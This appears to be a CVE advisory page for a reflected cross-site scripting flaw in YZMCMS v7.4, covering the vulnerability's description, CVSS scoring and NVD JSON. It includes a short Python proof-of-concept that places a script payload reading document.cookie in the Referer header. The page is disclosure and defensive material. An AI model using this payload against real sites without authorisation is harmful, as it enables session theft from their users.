Security Vulnerability Report
CVE-2026-29933 CVSS 6.1 MEDIUM

Published: 2026-03-26 15:16:36
Last Modified: 2026-03-31 21:38:25

Description

A reflected cross-site scripting (XSS) vulnerability in the /index/login.html component of YZMCMS v7.4 allows attackers to execute arbitrary JavaScript in the context of the user's browser by modifying the Referer value in the request header.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:yzmcms:yzmcms:7.4:*:*:*:*:*:*:* - VULNERABLE
YZMCMS v7.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL (vulnerable component)
target_url = "http://example.com/index/login.html"

# Payload placed in the Referer header.
# The application reflects this header into the page without sanitizing it, leading to XSS.
payload = "<script>alert(document.cookie)</script>"
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
    "Referer": payload,
}

try:
    # Send a GET request carrying the crafted header
    response = requests.get(target_url, headers=headers, timeout=10)
    # Check whether the payload is reflected unencoded in the response body
    if payload in response.text:
        print("[+] Vulnerability confirmed: reflected XSS via Referer header.")
    else:
        print("[-] Vulnerability not confirmed or payload blocked.")
except requests.RequestException as e:
    print(f"[!] Error occurred: {e}")

References

https://github.com/yzmcms/yzmcms/issues/69 (Exploit, Issue Tracking, Mitigation, Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-29933",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-26T15:16:35.890",
    "lastModified": "2026-03-31T21:38:24.613",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "A reflected cross-site scripting (XSS) vulnerability in the /index/login.html component of YZMCMS v7.4 allows attackers to execute arbitrary Javascript in the context of the user's browser via modifying the referrer value in the request header."},
      {"lang": "es", "value": "Una vulnerabilidad de cross-site scripting (XSS) reflejada en el componente /index/login.html de YZMCMS v7.4 permite a los atacantes ejecutar Javascript arbitrario en el contexto del navegador del usuario mediante la modificación del valor del referrer en la cabecera de la solicitud."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-79"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:yzmcms:yzmcms:7.4:*:*:*:*:*:*:*",
                "matchCriteriaId": "A6242988-038F-490C-BF15-892EA56E7ACA"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/yzmcms/yzmcms/issues/69",
        "source": "[email protected]",
        "tags": ["Exploit", "Issue Tracking", "Mitigation", "Vendor Advisory"]
      },
      {
        "url": "https://github.com/yzmcms/yzmcms/issues/69",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Exploit", "Issue Tracking", "Mitigation", "Vendor Advisory"]
      }
    ]
  }
}